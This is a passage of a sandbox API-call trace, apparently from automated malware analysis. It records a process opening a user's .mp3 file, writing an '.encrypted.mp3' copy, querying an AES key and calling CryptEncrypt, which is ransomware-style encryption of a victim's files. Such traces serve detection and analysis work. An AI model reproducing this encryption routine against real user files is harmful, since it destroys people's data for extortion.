lpMsg=0x6aed6c) returned 0 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f5esiwn.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.897] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.897] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0037.897] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f5esiwn.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0037.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0037.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.899] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.899] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xec0, lpOverlapped=0x0) returned 1 [0037.899] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xec0) returned 0x7c9968 [0037.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.900] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.900] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.900] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.900] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.900] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.901] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.901] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.901] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0037.902] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.902] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.902] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.902] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.902] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.903] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.903] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.903] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.903] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.903] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0037.903] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.903] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.903] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.903] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.903] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.903] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.904] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.904] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.904] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0037.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.904] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.904] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0037.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.905] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xec0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xed0) returned 1 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.905] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 